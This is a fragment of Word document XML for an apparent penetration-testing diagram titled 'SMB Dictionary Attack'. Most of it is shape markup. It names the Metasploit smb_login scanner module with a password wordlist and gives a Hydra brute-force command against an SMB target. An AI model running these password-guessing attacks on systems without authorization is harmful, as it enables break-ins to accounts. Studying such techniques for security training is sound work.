                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1730618</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>97472</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="382270" cy="442595"/>
                <wp:effectExtent l="7937" t="11113" r="44768" b="44767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2D3B" id="Down Arrow 18" o:spid="_x0000_s1026" type="#_x0000_t67" style="position:absolute;margin-left:136.25pt;margin-top:7.65pt;width:30.1pt;height:34.85pt;rotation:-90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f+hAIAACgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVNtOGzEQfa/Uf7D8XjZJEwoRGxSIqCoh&#10;QIKKZ8drZy35VtvJhn59j70bbuWp6j5YM57xXM6Z2bPzvdFkJ0JUztZ0fDSiRFjuGmU3Nf35cPXl&#10;hJKYmG2YdlbU9ElEer74/Oms83Mxca3TjQgEQWycd76mbUp+XlWRt8KweOS8sDBKFwxLUMOmagLr&#10;EN3oajIaHVedC40PjosYcbvqjXRR4kspeLqVMopEdE1RWypnKOc6n9XijM03gflW8aEM9g9VGKYs&#10;kj6HWrHEyDaov0IZxYOLTqYj7kzlpFRclB7QzXj0rpv7lnlRegE40T/DFP9fWH6zuwtENeAOTFlm&#10;wNHKdZYsQ3AdwSUQ6nycw/He34VBixBzu3sZDAkOsI6PQQe+ggL6IvsC8tMzyGKfCMfl15PJ5Buo&#10;4DBNp5PZ6SynqPpYOaYPMX0XzpAs1LRBNaWYEpntrmPq/Q9++U10WjVXSuuihM36UgeyYyB9dnF6&#10;sTqkeOOmLelQN4rJ1TAMn9QsQTQecES7oYTpDaaap1Byv3kdP0hSkresEUPqgkdf7OBeGn0TJ3ex&#10;YrHtnxRTP5RGJWyGVqamJz2yfSRtcxpRZnvAIvPTM5KltWuewGlhBZ1Fz68UklyzmO5YwHTjEhub&#10;bnFI7YCBGyRKWhd+f3Sf/TF0sFLSYVuAz68tC4IS/cNiHE/H0ynCpqJMZ98mUMJry/q1xW7NpQM3&#10;41JdEbN/0gdRBmcesdjLnBUmZjly90wMymXqtxi/Bi6Wy+KGlfIsXdt7z3PwjFOG92H/yIIfxilh&#10;Dm/cYbPY/N1A9b75pXXLbXJSlWl7wRUMZgXrWLgcfh1531/rxevlB7f4AwAA//8DAFBLAwQUAAYA&#10;CAAAACEAntBB7+EAAAAJAQAADwAAAGRycy9kb3ducmV2LnhtbEyPQU7DMBBF90jcwRokdtRuAk0V&#10;4lQVqIUiFqXlAG48xBGxHdluGzg9wwp2M5qnP+9Xi9H27IQhdt5JmE4EMHSN151rJbzvVzdzYDEp&#10;p1XvHUr4wgiL+vKiUqX2Z/eGp11qGYW4WCoJJqWh5Dw2Bq2KEz+go9uHD1YlWkPLdVBnCrc9z4SY&#10;cas6Rx+MGvDBYPO5O1oJm7XNVsVrWJvt8137vX/cPr1kSymvr8blPbCEY/qD4Vef1KEmp4M/Oh1Z&#10;LyGbFQWhNIgpMALyvLgFdpAwFznwuuL/G9Q/AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAA&#10;AOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAh&#10;ADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAh&#10;ANz/t/6EAgAAKAUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgA&#10;AAAhAJ7QQe/hAAAACQEAAA8AAAAAAAAAAAAAAAAA3gQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAA&#10;BAAEAPMAAADsBQAAAAA=&#10;" adj="12272" fillcolor="#5b9bd5" strokecolor="#41719c" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D28B7" w:rsidRDefault="007D28B7" w:rsidP="007D28B7"/>
    <w:p w:rsidR="007D28B7" w:rsidRDefault="007D28B7" w:rsidP="007D28B7"/>
    <w:p w:rsidR="004A29C7" w:rsidRDefault="004A29C7" w:rsidP="007D28B7"/>
    <w:p w:rsidR="004A29C7" w:rsidRDefault="004A29C7" w:rsidP="007D28B7"/>
    <w:p w:rsidR="004952F9" w:rsidRDefault="004952F9" w:rsidP="007D28B7"/>
    <w:p w:rsidR="007D28B7" w:rsidRPr="007D28B7" w:rsidRDefault="00E67F88" w:rsidP="007D28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A9DDB" wp14:editId="7EB6C82D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>752856</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-6960</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3533242" cy="498143"/>
                <wp:effectExtent l="0" t="0" r="10160" b="16510"/>
                <wp:wrapNone/>
                <wp:docPr id="77" name="Round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4981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F88" w:rsidRPr="003229F4" w:rsidRDefault="00E67F88" w:rsidP="00E67F8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67F88">
                              <w:rPr>
                                <w:sz w:val="32"/>
                              </w:rPr>
                              <w:t>SMB Dictionary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9DDB" id="Round Same Side Corner Rectangle 77" o:spid="_x0000_s1076" style="position:absolute;margin-left:59.3pt;margin-top:-.55pt;width:278.2pt;height:39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3242,4981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n1fQIAAEgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtv2zAMvg/YfxB0Xx0n6SuoUwQpOgwo&#10;2qDp0LMiS4kBWdQoJXb260fJTlK0vWzYxSZFfnzpo25u29qwnUJfgS14fjbgTFkJZWXXBf/5cv/t&#10;ijMfhC2FAasKvlee306/frlp3EQNYQOmVMgoiPWTxhV8E4KbZJmXG1ULfwZOWTJqwFoEUnGdlSga&#10;il6bbDgYXGQNYOkQpPKeTu86I5+m+ForGZ609iowU3CqLaQvpu8qfrPpjZisUbhNJfsyxD9UUYvK&#10;UtJjqDsRBNti9SFUXUkEDzqcSagz0LqSKvVA3eSDd90sN8Kp1AsNx7vjmPz/CysfdwtkVVnwy0vO&#10;rKjpjp5ha0u2JJktq1KxOaClS3qmYQq7NoqRK82tcX5C8KVbYK95EuMQWo11/FN7rE2z3h9nrdrA&#10;JB2Ozkej4XjImSTb+PoqH49i0OyEdujDdwU1i0LBMVY1jFXFQtKwxe7Bhw50cKYIsa6ukiSFvVGx&#10;GGOflaZOY+6EThxTc4NsJ4gdJuR9AckzQnRlzBGUfwYSUiobLnpg7x+hKnHvb8BHRMoMNhzBdWUB&#10;P8t+Kll3/ofuu55j+6Fdtel6zxPX49EKyj3dOUK3DN7J+4om/CB8WAgk9tOe0EaHJ/poA03BoZc4&#10;2wD+/uw8+hMpycpZQ9tUcP9rK1BxZn5Yout1Ph7H9UvK+PxySAq+tazeWuy2ngNdSU5vh5NJjP7B&#10;HESNUL/S4s9iVjIJKyl3wWXAgzIP3ZbT0yHVbJbcaOWcCA926WQMHgcdefPSvgp0Pc0CEfQRDpsn&#10;Ju841vlGpIXZNoCuEgFPc+2vgNY1kbl/WuJ78FZPXqcHcPoHAAD//wMAUEsDBBQABgAIAAAAIQCG&#10;KV4B3wAAAAkBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BS8NAEIXvgv9hGcGLtJtUm4SYTRFBxIvQ&#10;qoi3bXaahGRnQ3abxH/veNLjYz7efK/YLbYXE46+daQgXkcgkCpnWqoVvL89rTIQPmgyuneECr7R&#10;w668vCh0btxMe5wOoRZcQj7XCpoQhlxKXzVotV+7AYlvJzdaHTiOtTSjnrnc9nITRYm0uiX+0OgB&#10;HxususPZKtiG7ubz5Q6f481kMpy/utfTR6TU9dXycA8i4BL+YPjVZ3Uo2enozmS86DnHWcKoglUc&#10;g2AgSbc87qggTW9BloX8v6D8AQAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAA&#10;lAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAHOzSfV9AgAA&#10;SAUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAIYpXgHf&#10;AAAACQEAAA8AAAAAAAAAAAAAAAAA1wQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADj&#10;BQAAAAA=&#10;" adj="-11796480,,5400" path="m83025,l3450217,v45853,,83025,37172,83025,83025l3533242,498143r,l,498143r,l,83025c,37172,37172,,83025,xe" fillcolor="#70ad47 [3209]" strokecolor="white [3201]" strokeweight="1.5pt">
                <v:stroke joinstyle="miter"/>
                <v:formulas/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="83025,0;3450217,0;3533242,83025;3533242,498143;3533242,498143;0,498143;0,498143;0,83025;83025,0" o:connectangles="0,0,0,0,0,0,0,0,0" textboxrect="0,0,3533242,498143"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00E67F88" w:rsidRPr="003229F4" w:rsidRDefault="00E67F88" w:rsidP="00E67F88">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00E67F88">
                        <w:rPr>
                          <w:sz w:val="32"/>
                        </w:rPr>
                        <w:t>SMB Dictionary Attack</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D28B7" w:rsidRPr="007D28B7" w:rsidRDefault="007D28B7" w:rsidP="007D28B7"/>
    <w:p w:rsidR="007D28B7" w:rsidRDefault="004A29C7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965F1D" wp14:editId="18CBCA95">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2553920</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>32067</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="382270" cy="442595"/>
                <wp:effectExtent l="7937" t="11113" r="44768" b="44767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42AC" id="Down Arrow 85" o:spid="_x0000_s1026" type="#_x0000_t67" style="position:absolute;margin-left:201.1pt;margin-top:2.5pt;width:30.1pt;height:34.85pt;rotation:-90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XfhgIAACgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0X51kSdcGdYq0QYcB&#10;RVugHXpWZCkWoK9JSpzu1+9Jdvq1nob5IJAi9Ug+kj473xtNdiJE5WxNx0cjSoTlrlF2U9OfD1df&#10;TiiJidmGaWdFTZ9EpOeLz5/OOj8XE9c63YhAAGLjvPM1bVPy86qKvBWGxSPnhYVRumBYgho2VRNY&#10;B3Sjq8lodFx1LjQ+OC5ixO2qN9JFwZdS8HQrZRSJ6Joit1TOUM51PqvFGZtvAvOt4kMa7B+yMExZ&#10;BH2GWrHEyDaov6CM4sFFJ9MRd6ZyUiouSg2oZjx6V819y7wotYCc6J9piv8Plt/s7gJRTU1PZpRY&#10;ZtCjlessWYbgOoJLMNT5OIfjvb8LgxYh5nL3MhgSHGgdH6Md+AoLqIvsC8lPzySLfSIcl19PJpNv&#10;aAWHaTqdzE5LiKrHypg+xPRdOEOyUNMG2ZRkCjLbXceEJOB/8MtvotOquVJaFyVs1pc6kB1D02cX&#10;pxerQ4g3btqSDnkjmZwNw/BJzRJE40FHtBtKmN5gqnkKJfab1/GDICV4yxoxhC589MkO7iXxNzi5&#10;ihWLbf+kmPqhNCphM7QyaE3PbI+kbQ4jymwPXOT+9B3J0to1T+hp6Qoqi55fKQS5ZjHdsYDpxiU2&#10;Nt3ikNqBAzdIlLQu/P7oPvtj6GClpMO2gJ9fWxYEJfqHxTiejqdTwKaiTGffJlDCa8v6tcVuzaVD&#10;b8YluyJm/6QPogzOPGKxlzkqTMxyxO47MSiXqd9i/Bq4WC6LG1bKs3Rt7z3P4JmnTO/D/pEFP4xT&#10;whzeuMNmsfm7gep980vrltvkpCrT9sIrOpgVrGPp5fDryPv+Wi9eLz+4xR8AAAD//wMAUEsDBBQA&#10;BgAIAAAAIQCnKN2w4QAAAAgBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/NTsMwEITvSLyDtUjcqN3Q&#10;NjTEqSpQy484lJYHcGMTR8TryHbbwNOznMpxNKOZb8rF4Dp2NCG2HiWMRwKYwdrrFhsJH7vVzR2w&#10;mBRq1Xk0Er5NhEV1eVGqQvsTvpvjNjWMSjAWSoJNqS84j7U1TsWR7w2S9+mDU4lkaLgO6kTlruOZ&#10;EDPuVIu0YFVvHqypv7YHJ+Fl7bJV/hbWdvM8bX52j5un12wp5fXVsLwHlsyQzmH4wyd0qIhp7w+o&#10;I+sk3M7zCUUlzOkB+ZNZPga2l5ALAbwq+f8D1S8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+&#10;AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAA&#10;ACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAA&#10;ACEAxBnF34YCAAAoBQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYA&#10;CAAAACEApyjdsOEAAAAIAQAADwAAAAAAAAAAAAAAAADgBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAA&#10;AAAEAAQA8wAAAO4FAAAAAA==&#10;" adj="12272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58522</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>57607</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2399385" cy="490119"/>
                <wp:effectExtent l="0" t="0" r="20320" b="24765"/>
                <wp:wrapNone/>
                <wp:docPr id="78" name="Round Diagonal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85" cy="49011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9C7" w:rsidRDefault="00E67F88" w:rsidP="004A29C7">
                            <w:r w:rsidRPr="007D28B7">
                              <w:t>Metasploit</w:t>
                            </w:r>
                            <w:r w:rsidR="007A436E">
                              <w:t xml:space="preserve"> Script</w:t>
                            </w:r>
                            <w:r w:rsidR="004A29C7">
                              <w:t xml:space="preserve"> &gt;&gt; Dictionary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8" o:spid="_x0000_s1077" style="position:absolute;margin-left:4.6pt;margin-top:4.55pt;width:188.95pt;height:38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9385,49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2HkwIAAG4FAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0X22nydoEdYogRYcB&#10;RVv0Az0rshQbkERNUmJnv36U7LhFW+wwLAdHEskn8umRF5edVmQvnG/AlLQ4ySkRhkPVmG1Jn5+u&#10;v51T4gMzFVNgREkPwtPL5dcvF61diAnUoCrhCIIYv2htSesQ7CLLPK+FZv4ErDBolOA0C7h126xy&#10;rEV0rbJJnn/PWnCVdcCF93h61RvpMuFLKXi4k9KLQFRJMbeQvi59N/GbLS/YYuuYrRs+pMH+IQvN&#10;GoOXjlBXLDCyc80HKN1wBx5kOOGgM5Cy4SLVgNUU+btqHmtmRaoFyfF2pMn/P1h+u793pKlKeoYv&#10;ZZjGN3qAnanIVcO2YJgia3AG3+gBuWRmqwRBT6SttX6B0Y/23g07j8vIQSedjv9YHekS1YeRatEF&#10;wvFwcjqfn57PKOFom87zophH0Ow12joffgjQJC5K6mJSk5hUTCRxzfY3PvRBR2dEiHn1maRVOCgR&#10;k1HmQUgsNN6dopPExFo5smcoDsa5MKHoTTWrRH88y/E3ZDZGpDwTYESWjVIj9gAQ5fsRu8918I+h&#10;Iil0DM7/llgfPEakm8GEMVg3BtxnAAqrGm7u/Y8k9dRElkK36ZIIZsk1Hm2gOqAyHPQt4y2/bvAh&#10;bpgP98xhj2A3Yd+HO/xIBW1JYVhRUoP7/dl59EfpopWSFnuupP7XjjlBifppUNTzYjqNTZo209nZ&#10;BDfurWXz1mJ2eg34cgVOGMvTMvoHdVxKB/oFx8Mq3oomZjjeXVIe3HGzDv0swAHDxWqV3LAxLQs3&#10;5tHyCB6JjvJ66l6Ys4MaA+r4Fo79yRbvpNj7xkgDq10A2SSdvvI6PAE2ddLSMIDi1Hi7T16vY3L5&#10;BwAA//8DAFBLAwQUAAYACAAAACEApCd2ftsAAAAGAQAADwAAAGRycy9kb3ducmV2LnhtbEyOQU/C&#10;QBCF7yb+h82YeJMtkGAt3RKDwegRNHId2qHb0J1tukup/nrHk5zevLyXN1++Gl2rBupD49nAdJKA&#10;Ii591XBt4PNj85CCChG5wtYzGfimAKvi9ibHrPIX3tKwi7WSEQ4ZGrAxdpnWobTkMEx8RyzZ0fcO&#10;o9i+1lWPFxl3rZ4lyUI7bFg+WOxobak87c7OwMDrxjr7cnrf7HHb7ek1vv18GXN/Nz4vQUUa438Z&#10;/vAFHQphOvgzV0G1Bp5mUhSZgpJ0nj7KcTCQLuagi1xf4xe/AAAA//8DAFBLAQItABQABgAIAAAA&#10;IQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0A&#10;FAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0A&#10;FAAGAAgAAAAhAAF0bYeTAgAAbgUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsB&#10;Ai0AFAAGAAgAAAAhAKQndn7bAAAABgEAAA8AAAAAAAAAAAAAAAAA7QQAAGRycy9kb3ducmV2Lnht&#10;bFBLBQYAAAAABAAEAPMAAAD1BQAAAAA=&#10;" adj="-11796480,,5400" path="m81688,l2399385,r,l2399385,408431v,45115,-36573,81688,-81688,81688l,490119r,l,81688c,36573,36573,,81688,xe" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:formulas/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="81688,0;2399385,0;2399385,0;2399385,408431;2317697,490119;0,490119;0,490119;0,81688;81688,0" o:connectangles="0,0,0,0,0,0,0,0,0" textboxrect="0,0,2399385,490119"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="004A29C7" w:rsidRDefault="00E67F88" w:rsidP="004A29C7">
                      <w:r w:rsidRPr="007D28B7">
                        <w:t>Metasploit</w:t>
                      </w:r>
                      <w:r w:rsidR="007A436E">
                        <w:t xml:space="preserve"> Script</w:t>
                      </w:r>
                      <w:r w:rsidR="004A29C7">
                        <w:t xml:space="preserve"> &gt;&gt; Dictionary attack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DA05F9" wp14:editId="652400FD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3042539</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>42545</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2881148" cy="460857"/>
                <wp:effectExtent l="0" t="0" r="14605" b="158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48" cy="4608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7D28B7" w:rsidP="007A436E">
                            <w:r>
                              <w:t>auxiliary/scanner/smb/smb_login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A05F9" id="Rounded Rectangle 33" o:spid="_x0000_s1078" style="position:absolute;margin-left:239.55pt;margin-top:3.35pt;width:226.85pt;height:3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5AcQIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9P2zAQfp+0/8Hy+0hTWugqUlSBmCYh&#10;qICJZ9ex22iOzzu7Tbq/fmcnDYghbZr2kvh83/3+zheXbW3YXqGvwBY8PxlxpqyEsrKbgn97uvk0&#10;48wHYUthwKqCH5Tnl4uPHy4aN1dj2IIpFTJyYv28cQXfhuDmWeblVtXCn4BTlpQasBaBRNxkJYqG&#10;vNcmG49GZ1kDWDoEqbyn2+tOyRfJv9ZKhnutvQrMFJxyC+mL6buO32xxIeYbFG5byT4N8Q9Z1KKy&#10;FHRwdS2CYDusfnNVVxLBgw4nEuoMtK6kSjVQNfnoTTWPW+FUqoWa493QJv//3Mq7/QpZVRb89JQz&#10;K2qa0QPsbKlK9kDdE3ZjFCMdNapxfk74R7fCXvJ0jFW3Guv4p3pYm5p7GJqr2sAkXY5nszyfEB0k&#10;6SZno9n0PDrNXqwd+vBFQc3ioeAY04g5pMaK/a0PHf6II+OYUpdEOoWDUTEPYx+UpqoobJ6sE5/U&#10;lUG2F8QEIaWyYdrHT+hopitjBsPxnw17fDRViWuD8V9EHSxSZLBhMK4rC/he9PJ73qesO/yxA13d&#10;sQWhXbdpnNNxhMarNZQHmjFCR37v5E1FDb4VPqwEEttpL2iDwz19tIGm4NCfONsC/nzvPuKJhKTl&#10;rKHtKbj/sROoODNfLdHzcz6ZxHVLwmR6PiYBX2vWrzV2V18BjSWnt8LJdIz4YI5HjVA/06IvY1RS&#10;CSspdsFlwKNwFbqtpqdCquUywWjFnAi39tHJIxEid57aZ4GuZ1kgft7BcdPE/A3POmwckYXlLoCu&#10;Eglf+tqPgNYzcbl/SuL+v5YT6uXBW/wCAAD//wMAUEsDBBQABgAIAAAAIQBOxW/s3QAAAAgBAAAP&#10;AAAAZHJzL2Rvd25yZXYueG1sTI/NTsMwEITvSLyDtUjcqNO0apqQTUVROXCk7QO48TaJGq+j2Pkp&#10;T485wXE0o5lv8t1sWjFS7xrLCMtFBIK4tLrhCuF8+njZgnBesVatZUK4k4Nd8fiQq0zbib9oPPpK&#10;hBJ2mUKove8yKV1Zk1FuYTvi4F1tb5QPsq+k7tUUyk0r4yjaSKMaDgu16ui9pvJ2HAzCQe+v+vPG&#10;Q7I3rvue1rGKxhjx+Wl+ewXhafZ/YfjFD+hQBKaLHVg70SKsk3QZogibBETw01UcrlwQknQFssjl&#10;/wPFDwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAA&#10;W0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAA&#10;AAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCLX+5AcQIAADgFAAAOAAAAAAAAAAAA&#10;AAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBOxW/s3QAAAAgBAAAPAAAAAAAA&#10;AAAAAAAAAMs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7D28B7" w:rsidP="007A436E">
                      <w:r>
                        <w:t>auxiliary/scanner/smb/smb_login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8B7" w:rsidRDefault="007D28B7" w:rsidP="007D28B7"/>
    <w:p w:rsidR="007A436E" w:rsidRDefault="008B4BB9" w:rsidP="004A29C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="007A436E">
        <w:t>ordlist &gt;&gt; /usr/share/wordlists/metasploit/unix_passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004952F9" w:rsidRDefault="004952F9" w:rsidP="008B4BB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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5ED217" wp14:editId="5CAEC4E0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3042920</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>238379</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2880284" cy="614477"/>
                <wp:effectExtent l="0" t="0" r="15875" b="1460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284" cy="6144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7D28B7" w:rsidP="007A436E">
                            <w:r w:rsidRPr="007D28B7">
                              <w:t>hydra -l admin -P /usr/share/wordlists/rockyou.txt IP_addr smb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D217" id="Rounded Rectangle 34" o:spid="_x0000_s1079" style="position:absolute;left:0;text-align:left;margin-left:239.6pt;margin-top:18.75pt;width:226.8pt;height:4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RIcAIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9P2zAQfp+0/8Hy+0hbCnQVKapATJMQ&#10;IGDi2XXsNprt885uk+6v39lJA2JIm6a9JD7fd7+/8/lFaw3bKQw1uJKPj0acKSehqt265N+erj/N&#10;OAtRuEoYcKrkexX4xeLjh/PGz9UENmAqhYycuDBvfMk3Mfp5UQS5UVaEI/DKkVIDWhFJxHVRoWjI&#10;uzXFZDQ6LRrAyiNIFQLdXnVKvsj+tVYy3mkdVGSm5JRbzF/M31X6FotzMV+j8Jta9mmIf8jCitpR&#10;0MHVlYiCbbH+zZWtJUIAHY8k2AK0rqXKNVA149Gbah43wqtcCzUn+KFN4f+5lbe7e2R1VfLjKWdO&#10;WJrRA2xdpSr2QN0Tbm0UIx01qvFhTvhHf4+9FOiYqm412vSnelibm7sfmqvayCRdTmaz0WRGQSTp&#10;TsfT6dlZclq8WHsM8YsCy9Kh5JjSSDnkxordTYgd/oAj45RSl0Q+xb1RKQ/jHpSmqijsOFtnPqlL&#10;g2wniAlCSuXiSR8/o5OZro0ZDCd/NuzxyVRlrg3GfxF1sMiRwcXB2NYO8L3o1fdxn7Lu8IcOdHWn&#10;FsR21eZxnhwnaLpaQbWnGSN05A9eXtfU4BsR4r1AYjvtBW1wvKOPNtCUHPoTZxvAn+/dJzyRkLSc&#10;NbQ9JQ8/tgIVZ+arI3p+pvmmdcvC9ORsQgK+1qxea9zWXgKNZUxvhZf5mPDRHI4awT7Toi9TVFIJ&#10;Jyl2yWXEg3AZu62mp0Kq5TLDaMW8iDfu0csDERJ3ntpngb5nWSR+3sJh08T8Dc86bBqRg+U2gq4z&#10;CV/62o+A1jNzuX9K0v6/ljPq5cFb/AIAAP//AwBQSwMEFAAGAAgAAAAhAEzN3KbdAAAACgEAAA8A&#10;AABkcnMvZG93bnJldi54bWxMj8tOwzAQRfdI/IM1SOyogxMIDXEqimDBksIHuPE0iRqPo9h5wNcz&#10;rGA5mqN7zy13q+vFjGPoPGm43SQgkGpvO2o0fH683jyACNGQNb0n1PCFAXbV5UVpCusXesf5EBvB&#10;IRQKo6GNcSikDHWLzoSNH5D4d/KjM5HPsZF2NAuHu16qJLmXznTEDa0Z8LnF+nyYnIYXuz/ZtzNN&#10;+d6F4XvJlElmpfX11fr0CCLiGv9g+NVndajY6egnskH0GrJ8qxjVkOZ3IBjYpoq3HJlMsxRkVcr/&#10;E6ofAAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABb&#10;Q29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAA&#10;AAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAEN/lEhwAgAAOAUAAA4AAAAAAAAAAAAA&#10;AAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAEzN3KbdAAAACgEAAA8AAAAAAAAA&#10;AAAAAAAAy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7D28B7" w:rsidP="007A436E">
                      <w:r w:rsidRPr="007D28B7">
                        <w:t>hydra -l admin -P /usr/share/wordlists/rockyou.txt IP_addr smb</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008B4BB9">
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ordlist &gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="007D28B7">
        <w:t>/usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D28B7" w:rsidRPr="007D28B7" w:rsidRDefault="004A29C7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B7A00B" wp14:editId="2D83C2AE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>58522</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>92989</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2399030" cy="431597"/>
                <wp:effectExtent l="0" t="0" r="20320" b="26035"/>
                <wp:wrapNone/>
                <wp:docPr id="79" name="Round Diagonal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43159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9C7" w:rsidRDefault="007A436E" w:rsidP="004A29C7">
                            <w:r w:rsidRPr="007D28B7">
                              <w:t>Hydra</w:t>
                            </w:r>
                            <w:r w:rsidR="004A29C7">
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r w:rsidR="004A29C7">
                              <w:t>&gt;&gt; Dictionary attack</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="004A29C7" w:rsidRDefault="004A29C7" w:rsidP="00E67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A00B" id="Round Diagonal Corner Rectangle 79" o:spid="_x0000_s1080" 